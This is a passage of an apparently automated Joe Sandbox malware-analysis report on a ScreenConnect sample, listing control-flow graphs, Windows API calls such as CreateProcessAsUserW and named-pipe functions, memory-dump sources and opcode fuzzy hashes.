                                                                        control_flow_graph 574 5c02bd4-5c03594 576 5c03596-5c035bb 574->576 577 5c035e8-5c0366b CreateFileA 574->577 576->577 580 5c035bd-5c035bf 576->580 584 5c03674-5c036b2 577->584 585 5c0366d-5c03673 577->585 582 5c035c1-5c035cb 580->582 583 5c035e2-5c035e5 580->583 586 5c035cd 582->586 587 5c035cf-5c035de 582->587 583->577 592 5c036c2 584->592 593 5c036b4-5c036b8 584->593 585->584 586->587 587->587 588 5c035e0 587->588 588->583 595 5c036c3 592->595 593->592 594 5c036ba 593->594 594->592 595->595
                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C03655
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 150ebb29e38ae61501e0d6601e28a9d2be2adb86e81a71daf3f6d02f12b4902d
                                                                        • Instruction ID: f7554718d7d4425d1fd3a4ebb271bab336e0d84afdb0d1a72805c1c949c93a28
                                                                        • Opcode Fuzzy Hash: 150ebb29e38ae61501e0d6601e28a9d2be2adb86e81a71daf3f6d02f12b4902d
                                                                        • Instruction Fuzzy Hash: 855178B0D002889FDB10CFA9C944B9EBBF1FF48704F248829E818AB3A1D7759945CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 596 5c0352d-5c03594 597 5c03596-5c035bb 596->597 598 5c035e8-5c0366b CreateFileA 596->598 597->598 601 5c035bd-5c035bf 597->601 605 5c03674-5c036b2 598->605 606 5c0366d-5c03673 598->606 603 5c035c1-5c035cb 601->603 604 5c035e2-5c035e5 601->604 607 5c035cd 603->607 608 5c035cf-5c035de 603->608 604->598 613 5c036c2 605->613 614 5c036b4-5c036b8 605->614 606->605 607->608 608->608 609 5c035e0 608->609 609->604 616 5c036c3 613->616 614->613 615 5c036ba 614->615 615->613 616->616
                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05C03655
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: b676e2c909515ca59cb2ecf867c618f250ab42c2fc763279632f91085632450b
                                                                        • Instruction ID: ed0320a763631f9bad9dc40636ca1b90d90b69371400be6b9a65782d0fe267fd
                                                                        • Opcode Fuzzy Hash: b676e2c909515ca59cb2ecf867c618f250ab42c2fc763279632f91085632450b
                                                                        • Instruction Fuzzy Hash: F65146B1D002898FDB10CFA9C945B9EBBF1BB48704F248929E819AB3A0D7759945CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 641 5c13d7b-5c13dd1 643 5c13dd3-5c13dd9 641->643 644 5c13ddc-5c13de0 641->644 643->644 645 5c13de2-5c13de5 644->645 646 5c13de8-5c13dfd 644->646 645->646 647 5c13e0b-5c13e62 CreateProcessAsUserW 646->647 648 5c13dff-5c13e08 646->648 649 5c13e64-5c13e6a 647->649 650 5c13e6b-5c13e93 647->650 648->647 649->650
                                                                        APIs
                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05C13E4F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessUser
                                                                        • String ID:
                                                                        • API String ID: 2217836671-0
                                                                        • Opcode ID: d825b0728c9e1b3ae075dc98aed1ecd203bc36d0f4815494aa50a4ee4903f3b8
                                                                        • Instruction ID: f8380944150bf73f09e55ac93999fef6d3034b38f198a057dbb95adedb966b5a
                                                                        • Opcode Fuzzy Hash: d825b0728c9e1b3ae075dc98aed1ecd203bc36d0f4815494aa50a4ee4903f3b8
                                                                        • Instruction Fuzzy Hash: D34124B6900249DFCF10CFA9C880ADEBBF1FF48310F04882AE918A7250D375AA55DF94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 664 5c13703-5c14bca 666 5c14bd2-5c14c37 CreateNamedPipeW 664->666 667 5c14bcc-5c14bcf 664->667 669 5c14c40-5c14c61 666->669 670 5c14c39-5c14c3f 666->670 667->666 670->669
                                                                        APIs
                                                                        • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 05C14C24
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateNamedPipe
                                                                        • String ID:
                                                                        • API String ID: 2489174969-0
                                                                        • Opcode ID: 1040c45abebd8a3778168abf2d8dc4be214b85f56dc29f6a27f8eacf736965cc
                                                                        • Instruction ID: 1ec0d96d47a8f9291911957f016361286a2941f28e60d6bc6be0b934af0c8b38
                                                                        • Opcode Fuzzy Hash: 1040c45abebd8a3778168abf2d8dc4be214b85f56dc29f6a27f8eacf736965cc
                                                                        • Instruction Fuzzy Hash: B13144B5800248DFCB10CF9AD584B8EBBF1BF48310F188469E918AB221D376A855CF55
                                                                        APIs
                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05C15650
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectNamedPipe
                                                                        • String ID:
                                                                        • API String ID: 2191148154-0
                                                                        • Opcode ID: 6b2f44173e810467bb391cc0390b233761d275a123234f58a69f9c7506beb9a9
                                                                        • Instruction ID: d673e821dabc5b1d3efd3c3a2b406322eb6a6fb87c6df39efa1379f9de971780
                                                                        • Opcode Fuzzy Hash: 6b2f44173e810467bb391cc0390b233761d275a123234f58a69f9c7506beb9a9
                                                                        • Instruction Fuzzy Hash: 732132B5D002189FCB24CFAAC584B9EBBF1AF48300F14846AE819BB350D7759941CFA4
                                                                        APIs
                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05C15650
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectNamedPipe
                                                                        • String ID:
                                                                        • API String ID: 2191148154-0
                                                                        • Opcode ID: ce75fc6a1a9b7197787cbfd4e73ff953e1f75d3be2ddc2dc0c03a1fcd493f1f7
                                                                        • Instruction ID: 99ffc3bf1ccbeddd36e097e035a0210389c191cfaabeb8f021815c09d96d58cd
                                                                        • Opcode Fuzzy Hash: ce75fc6a1a9b7197787cbfd4e73ff953e1f75d3be2ddc2dc0c03a1fcd493f1f7
                                                                        • Instruction Fuzzy Hash: FE2113B4D00258DFCB24CFAAC584BDEBBF4AF48700F148469E819AB390D775A945CFA4
                                                                        APIs
                                                                        • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05C0653D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: EnumProcesses
                                                                        • String ID:
                                                                        • API String ID: 84517404-0
                                                                        • Opcode ID: 1556a0c61eb23be340c1eaf30a4e1b962548e59ab9b14c1ffc8c778199b16d4f
                                                                        • Instruction ID: cbf09061c09c556c1fb0c3f372c60aea5c77fb55828ebea872443b30c40c702f
                                                                        • Opcode Fuzzy Hash: 1556a0c61eb23be340c1eaf30a4e1b962548e59ab9b14c1ffc8c778199b16d4f
                                                                        • Instruction Fuzzy Hash: 6E2128B69042099FDB10CF9AC885BDEBBF4FB48310F10842DD519B7340C379A945CBA5
                                                                        APIs
                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05C15986), ref: 05C15A2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: NamedPipeWait
                                                                        • String ID:
                                                                        • API String ID: 3146367894-0
                                                                        • Opcode ID: 3befdefe8fa742b59014d2877ab1616ad50524143366388008c8d1fa6845b325
                                                                        • Instruction ID: a49a06b5bcb9b4760233e49f3c5ab30c6cea7bf48aa7659ff80236b3c65fea00
                                                                        • Opcode Fuzzy Hash: 3befdefe8fa742b59014d2877ab1616ad50524143366388008c8d1fa6845b325
                                                                        • Instruction Fuzzy Hash: 112115B68042498FDB10CF9AC484BEEBBF4EB89324F14846DD859B7740C379A945CFA5
                                                                        APIs
                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05C15986), ref: 05C15A2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2652027495.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c10000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: NamedPipeWait
                                                                        • String ID:
                                                                        • API String ID: 3146367894-0
                                                                        • Opcode ID: 32bd735f6dc6bfb36c7cb9d9d3a960733cf5b2ebc782a21aec9f748d0bf3565e
                                                                        • Instruction ID: d4571dd2e566a2c9faa9fc7359e718ccbca0e836c399bbca108b272159d4cfef
                                                                        • Opcode Fuzzy Hash: 32bd735f6dc6bfb36c7cb9d9d3a960733cf5b2ebc782a21aec9f748d0bf3565e
                                                                        • Instruction Fuzzy Hash: F22115B68002098FDB10CF9AC484BEEBBF4EB88214F14842DD859A7640C779A945CFA5
                                                                        APIs
                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05C0661E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSession
                                                                        • String ID:
                                                                        • API String ID: 3779259828-0
                                                                        • Opcode ID: 526697abbf3b5edff88d89d3f1eba725343468a32d5855beb69cee410504affc
                                                                        • Instruction ID: 009ad07d343644a21653cfb28b8918f252e27eba6f47ef490e856afc08274d44
                                                                        • Opcode Fuzzy Hash: 526697abbf3b5edff88d89d3f1eba725343468a32d5855beb69cee410504affc
                                                                        • Instruction Fuzzy Hash: 3C1114B5C042498FDB10CF9AC4447EEBBF4EB48224F14846AD559B7340D379A985CFA5
                                                                        APIs
                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05C0661E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2651900448.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_5c00000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSession
                                                                        • String ID:
                                                                        • API String ID: 3779259828-0
                                                                        • Opcode ID: 30de7efc7bd437687fc10c0dadcb635f1dabfddd49d1d5cc6b58beace20bedf3
                                                                        • Instruction ID: df8bbde7d4602ad1ebfa7ab091596dd8fc28b7b50e37a7ac09a5d3d2ac8e6567
                                                                        • Opcode Fuzzy Hash: 30de7efc7bd437687fc10c0dadcb635f1dabfddd49d1d5cc6b58beace20bedf3
                                                                        • Instruction Fuzzy Hash: 6C1112B6C002498FDB10CF9AC5447DEBBF4EB48224F15842AD458B7740D378A985CFA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #n^
                                                                        • API String ID: 0-854867752
                                                                        • Opcode ID: 11fa3986bd7468f0fe583b17f9dfa06b52f729fb2f2e72f368f3148327b40316
                                                                        • Instruction ID: 4b536a49954dc1c7023637f3d68c14ee86a8925bcb7ab88631e10276ff2f2340
                                                                        • Opcode Fuzzy Hash: 11fa3986bd7468f0fe583b17f9dfa06b52f729fb2f2e72f368f3148327b40316
                                                                        • Instruction Fuzzy Hash: 2171E535B002058FDB24EF68D844A9EBBF6FF88214B1055AAD506EB361DF34EC01CB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: c!
                                                                        • API String ID: 0-3867720870
                                                                        • Opcode ID: a9680ae79f439a56395c2edeb85f7cb3b399d0fb50aa959fa9608a628056cd90
                                                                        • Instruction ID: 626f2e01fe087822fab253f7028cbb0cef8baeeef1b43d214512dca33d8d2d23
                                                                        • Opcode Fuzzy Hash: a9680ae79f439a56395c2edeb85f7cb3b399d0fb50aa959fa9608a628056cd90
                                                                        • Instruction Fuzzy Hash: A65139347007058FEB28DF29C484A5AB7F6FF892147109A28D496EB764E734F805CF94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Sn^
                                                                        • API String ID: 0-3260546301
                                                                        • Opcode ID: 7f93c980c27a1e809ef8ca941b8156bdb738f7067e8d7fb5ad37185ee7681a19
                                                                        • Instruction ID: c0903fe43a809348d0fc0b767cd82c2fce12d1de5d4903e27968a890986aca49
                                                                        • Opcode Fuzzy Hash: 7f93c980c27a1e809ef8ca941b8156bdb738f7067e8d7fb5ad37185ee7681a19
                                                                        • Instruction Fuzzy Hash: 69418D787002028FDB25DB78D454A69BBF2FF89310B1595A9E849CB361DB34EC05CB51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Sn^
                                                                        • API String ID: 0-3260546301
                                                                        • Opcode ID: 786a5133fe47fd84317551c19b655a49630ecd804184604cdb260350da324f94
                                                                        • Instruction ID: 807c04d5d9a3f0f694583cec5b7ab8e836503ac0ec11ffef44081af37200d318
                                                                        • Opcode Fuzzy Hash: 786a5133fe47fd84317551c19b655a49630ecd804184604cdb260350da324f94
                                                                        • Instruction Fuzzy Hash: 2D413878B006028FEB14DB28D494A2AB7F2FF89314B1595A9E85ADB361DB34FC05CF41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Sn^
                                                                        • API String ID: 0-3260546301
                                                                        • Opcode ID: 495f73d20cc52d5a3f6ac562834e3c0074624cc843c4878bd9eac73428fe5285
                                                                        • Instruction ID: 95d5a3910f65e8695d801ff352e717f990756e00d0424295d88d3def4e82581f
                                                                        • Opcode Fuzzy Hash: 495f73d20cc52d5a3f6ac562834e3c0074624cc843c4878bd9eac73428fe5285
                                                                        • Instruction Fuzzy Hash: 4B310534B006028FDB14DB69D494A2AB7F6FF89324B119568E85A9B360DB34FC05CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: [
                                                                        • API String ID: 0-3285150910
                                                                        • Opcode ID: b49ac37871e6529a63420fcb5eee60d8a5f87b71f785a1a4b9a0e19420675e26
                                                                        • Instruction ID: 68c166e80f832220d62a0703b97eafa3b962b9e9aa177cce99414255fee588b3
                                                                        • Opcode Fuzzy Hash: b49ac37871e6529a63420fcb5eee60d8a5f87b71f785a1a4b9a0e19420675e26
                                                                        • Instruction Fuzzy Hash: 8EF0C2327003005BE7159B6A941049EBBE2EFC5214704C9BAD409DB264EF3AEC028B95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d58f96d519191f8b1326f71bf1d4ad41402cb46db99e2c4f0e266da9da98174
                                                                        • Instruction ID: 6156b9c04e598c6d4de7b643794ab0ef979c478e68cbab85561dd1d118924fe1
                                                                        • Opcode Fuzzy Hash: 2d58f96d519191f8b1326f71bf1d4ad41402cb46db99e2c4f0e266da9da98174
                                                                        • Instruction Fuzzy Hash: 7DC1CF31A103419FEB25EF68D49069DBBF2EF85204B159969D445EB321EF38FC06CB85
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acfc4b262e3138f000be87f2ecdc51e2c4e00ce70844b7f17e5beae1f73ce851
                                                                        • Instruction ID: d0aa9c4ef2d680e4e2411bd74ba547461e5d01a40c7b780d3f6df099e2dc76b2
                                                                        • Opcode Fuzzy Hash: acfc4b262e3138f000be87f2ecdc51e2c4e00ce70844b7f17e5beae1f73ce851
                                                                        • Instruction Fuzzy Hash: 5D512130B503429BEB35AB38C84072EB7A7EBC9204B15966DC0568B355DF79EC468B80
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26224ed9ff3896324e4f9ef47af7cd19478b8b2ec14191f359b2f42221b607e5
                                                                        • Instruction ID: 92d9a675e1d04120ed3ad8640527c8d122a37b993cf23e79c076d631dbd8f759
                                                                        • Opcode Fuzzy Hash: 26224ed9ff3896324e4f9ef47af7cd19478b8b2ec14191f359b2f42221b607e5
                                                                        • Instruction Fuzzy Hash: 8F41F775600B018FDB34DF29D884666B7F1BF89314B105A6CE496DB7A4EB34F806CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25c8166edbd781d0e8645439720a48dda9003adce2a68c67d749043475fd0fb2
                                                                        • Instruction ID: c023de0e38ab41ff0332dc96dc9240795c38ce54b99b9ee085b2aa50a0a5d9fd
                                                                        • Opcode Fuzzy Hash: 25c8166edbd781d0e8645439720a48dda9003adce2a68c67d749043475fd0fb2
                                                                        • Instruction Fuzzy Hash: 194119717007018FDB30CF29C484A6ABBF2BF89314B149A58D4869B7A5EB30F806CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d0f64d53447307504e3d953281de68986fc5cbf45a26a4e22ade06df78ef8d0
                                                                        • Instruction ID: 539a1527bdecad6101932aa65de8eb09d15adb780a5c53152e49426bbc5d25f9
                                                                        • Opcode Fuzzy Hash: 0d0f64d53447307504e3d953281de68986fc5cbf45a26a4e22ade06df78ef8d0
                                                                        • Instruction Fuzzy Hash: 3631A071B102159FEF18DFA9C45066EF3F6EF8D214B10842AD819E7314EB34EC018B94
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 888537f626283d10424f90e204fe6df4e5d2507b6700384485b754b2509034a3
                                                                        • Instruction ID: b6dc5d74f0f88e92dadcb117ca5154e862b192b2e8f11a30e3ecd2ed4595e17a
                                                                        • Opcode Fuzzy Hash: 888537f626283d10424f90e204fe6df4e5d2507b6700384485b754b2509034a3
                                                                        • Instruction Fuzzy Hash: E131F530B107418FE725EB79C450A6EBBE2AFC9220B5658ADD041DB3A1DF39EC05CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 575b88df0deba83ede08a388d4b5ea781e9a8b1d7f61a541756be1ff0a7cde06
                                                                        • Instruction ID: 298df761e4201f1eca4c2ab26b13db7c9ea22be95e9ec9917db2ccb55776d99e
                                                                        • Opcode Fuzzy Hash: 575b88df0deba83ede08a388d4b5ea781e9a8b1d7f61a541756be1ff0a7cde06
                                                                        • Instruction Fuzzy Hash: 26310671600B018BD738DF29D84865ABBF1AF89311B504B2CE4A6976F1EB34F944CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2621205745.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_112d000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 64c66665cec18c870498d2ffba26933c9de6fea6eea54948e1743721a595840d
                                                                        • Instruction ID: 12f32c29e97193a71bf9f3f120c180400a6a75bbd22f339379c980b3422f0ac5
                                                                        • Opcode Fuzzy Hash: 64c66665cec18c870498d2ffba26933c9de6fea6eea54948e1743721a595840d
                                                                        • Instruction Fuzzy Hash: 2C2128B6504280DFDF19DF54E9C0B26BF65FB88314F20C169D9090B256C33AD865CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 173bcd2e6a63c26d741f3eabc24551e77a4380740738b05ddedb5481b9308e6b
                                                                        • Instruction ID: a1a052477bc713654bbe3764446b277ae7a64aab0641ee3384af4e8e3259c65d
                                                                        • Opcode Fuzzy Hash: 173bcd2e6a63c26d741f3eabc24551e77a4380740738b05ddedb5481b9308e6b
                                                                        • Instruction Fuzzy Hash: 302193313007515BE215EB65D8C1A6EB3A7EBC8250B848E38C2198F754DF75FC0987E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e2c3ea2b36180333492d636c77e12d775332a41b09758b01189eeb299e4a91b0
                                                                        • Instruction ID: e35bea2411f3526e688f0e63887ab745dbdbc70470e34e31f360e9057bf2254f
                                                                        • Opcode Fuzzy Hash: e2c3ea2b36180333492d636c77e12d775332a41b09758b01189eeb299e4a91b0
                                                                        • Instruction Fuzzy Hash: B021E931B002598FEB64DBA4D454AEEB7F1BF9D310F0150A9D446AB360DB78AC40CB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b039f95dfb7ae801c1917854b6fd028e7a29c9768feed089cafecdd2549724f0
                                                                        • Instruction ID: 3bbca7986031a07617747b337ae032a7331e9c69fd5886e9c4a1ae158ff7107d
                                                                        • Opcode Fuzzy Hash: b039f95dfb7ae801c1917854b6fd028e7a29c9768feed089cafecdd2549724f0
                                                                        • Instruction Fuzzy Hash: 4B21AFB5E102558FDB60EF68D8846DEBBF1FF4920074145AAD845EB311EB38A806CFA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31abca82186985036804569ce160ee5db3a3611888d040289d0e511f7a8349f5
                                                                        • Instruction ID: d120cf7909bfea8f1c38cc394df0a0307bcecb942167d67e1dd97c32a1f53872
                                                                        • Opcode Fuzzy Hash: 31abca82186985036804569ce160ee5db3a3611888d040289d0e511f7a8349f5
                                                                        • Instruction Fuzzy Hash: E5213731A006198FEB64DBA4C464BAEB7F1AF9D310F0054A9D446AB3A0DB78AC40CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2621205745.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_112d000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3e04c74edf482b81a3f0ca162d52722757ecfafa2c539cd1b972ed9c9184339
                                                                        • Instruction ID: a90cdf6231b3c3be82e03742c8164055f29816deeac951f35bf1669f711017b1
                                                                        • Opcode Fuzzy Hash: b3e04c74edf482b81a3f0ca162d52722757ecfafa2c539cd1b972ed9c9184339
                                                                        • Instruction Fuzzy Hash: B211AF76504680CFDF16CF54E9C4B16BF72FB88324F24C6A9D8494B256C33AD466CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2645581793.0000000004370000.00000040.00000800.00020000.00000000.sdmp, Offset: 04370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4370000_ScreenConnect.jbxd
                                                                        Similarity
